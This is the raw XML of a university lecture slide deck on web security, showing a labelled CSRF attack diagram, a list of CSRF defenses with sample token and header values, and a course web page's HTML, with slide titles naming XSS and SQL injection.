          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2058987" y="4800600"/>
            <a:ext cx="2906713" cy="10668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3" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2886075" y="3014663"/>
            <a:ext cx="2449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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2505075" y="4191000"/>
            <a:ext cx="2830512" cy="990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5" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3241675" y="4527550"/>
            <a:ext cx="3076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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2427287" y="4930775"/>
            <a:ext cx="2932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rgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2608262" y="2530475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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2989262" y="3962400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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2182812" y="4387850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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2668587" y="3192463"/>
            <a:ext cx="2830513" cy="61753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1" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2439987" y="3352800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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="4252912" y="3325813"/>
            <a:ext cx="12128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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326610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CSRF Defenses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Secret Validation Token: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Referrer Validation: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Custom HTTP Header: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User Interaction (e.g., CAPTCHA)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318125" y="6145213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40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRP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4114800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="28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2832" y="1008"/>
              <a:ext cx="2544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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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2832" y="1035"/>
              <a:ext cx="260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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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4114800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr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2832" y="2050"/>
              <a:ext cx="2880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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRP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2832" y="2078"/>
              <a:ext cx="29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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referrer: http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>www.facebook.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>home.php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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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4114800" y="5334000"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288"/>
          </a:xfrm>
        </p:grpSpPr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2832" y="3051"/>
              <a:ext cx="2208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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRP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2832" y="3078"/>
              <a:ext cx="224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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>XMLHttpRequest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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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86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943350"/>
            <a:ext cx="1524000" cy="72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5105400"/>
            <a:ext cx="10287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2700" y="2247900"/>
            <a:ext cx="8001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2457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000" dirty="0"/>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;meta charset="utf-8"&gt;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dirty="0"/>
              <a:t>        &lt;title&gt;CS 181S - Fall 2018&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>fonts.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css?family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>=Source+Sans+Pro:300,300i,600,700,700i' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='stylesheet' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>fonts.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css?family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>=Inconsolata:400,700,700i' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='stylesheet' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'&gt;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dirty="0"/>
              <a:t>        &lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>bootstrap.min.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>main.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;header class="site-header"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;div class="navbar navbar-inverse navbar-fixed-top"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;div class="container-fluid"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>            &lt;div class="navbar-header"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                    &lt;span class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>-only"&gt;Toggle navigation&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                    &lt;span class="icon-bar"&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                    &lt;span class="icon-bar"&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                    &lt;span class="icon-bar"&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;a class="navbar-brand" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="/courses/cs5430/2018sp/"&gt;CS 181S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		  &lt;span class="hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>xs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;: System Security&lt;/span&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		  &lt;span class="hidden-md hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>lg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt; - Fall 2018&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>            &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343924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Object Model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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2057400"/>
            <a:ext cx="8964264" cy="3719127"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14625102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Clarity">
  <a:themeElements>
    <a:clrScheme name="AExam">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="A5A5A5"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A5A5A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0070C0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B050"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="FF0000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFFFFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFFFFF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0070C0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6495FFB3-5D92-074E-B89D-542AE82BF1BE}" vid="{19B8E867-9DEE-184C-A40C-B4D7506C62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AExam</Template>
  <TotalTime>32347</TotalTime>
  <Words>1311</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>276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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>American Typewriter</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Clarity</vt:lpstr>
      <vt:lpstr>Lecture 23: Web Security (cont'd)</vt:lpstr>
      <vt:lpstr>Networking Stack</vt:lpstr>
      <vt:lpstr>Application Layer HTTP</vt:lpstr>
      <vt:lpstr>Vulnerabilities by Year</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Domain Object Model</vt:lpstr>
      <vt:lpstr>Dynamic Web Pages</vt:lpstr>
      <vt:lpstr>Same Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>SOP Exceptions</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack vectors</vt:lpstr>
      <vt:lpstr>Example XSS attacks</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>Command Injection </vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQLi in the Wild</vt:lpstr>
      <vt:lpstr>Defenses Against SQL Injection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Eleanor  Birrell</cp:lastModifiedBy>
  <cp:revision>492</cp:revision>
  <cp:lastPrinted>2018-04-30T16:15:49Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-05T20:19:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-11T06:09:12Z</dcterms:modified>
</cp:coreProperties>
</file>